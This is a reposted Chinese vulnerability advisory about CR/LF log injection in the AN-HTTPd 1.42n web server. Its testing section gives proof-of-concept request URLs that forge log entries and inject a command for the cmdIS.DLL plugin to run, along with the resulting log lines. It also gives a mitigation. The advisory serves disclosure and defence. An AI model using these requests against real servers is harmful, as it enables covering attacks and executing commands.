AN HTTP任意日志内容注入漏洞

2008-04-09 04:21:27来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

AN HTTP任意日志内容注入漏洞

发布日期:2005-04-11
更新日期:2005-04-11

受影响系统:
AN AN-HTTPd 1.42 n
描述:
BUGTRAQ ID: 13069

AN HTTPD Server是一款Windows 95/98/Me/NT/2000/XP平台下的web服务程序。

AN HTTPD中的输入验证错误可能允许远程攻击者向日志文件中注入任意内容,导致隐藏攻击和/或误导管理员。

特别是在记录请求前AN HTTPD没有过滤掉URI中的CR和LF字符,这样攻击者就可能破坏日志文件或注入假的条目。攻击者还可以向日志文件中注入cmdIS.DLL插件可执行的命令。

<*来源:Tan Chew Keong (chewkeong@security.org.sg)

链接:http://www.security.org.sg/vuln/anhttpd142n.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://[hostname]/a HTTP/1.0" 200 2048 255.255.255.255 - - [06/Mar/2005:22:31:11 0800] "GET /hack

192.168.2.100 - - [06/Mar/2005:22:39:30 0800] "GET /a HTTP/1.0" 200 2048
255.255.255.255 - - [06/Mar/2005:22:31:11 0800] "GET /hack HTTP/1.0" 404 215

http://[hostname]/ type cgi-bin\test.bat

192.168.2.100 - - [06/Mar/2005:22:59:25 0800] "GET /
type cgi-bin/test.bat HTTP/1.1" 404 211

http://[hostname]/scripts/cmdIS.dll/httpd.log

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 不要将httpd.log放置于文档根目录。

厂商补丁:

AN
--
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.st.rim.or.jp/~nakata/

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Microsoft Windows处理大图形拒绝服务漏洞

下一篇:Zone Labs IMsecure Active Link过滤函数绕过漏洞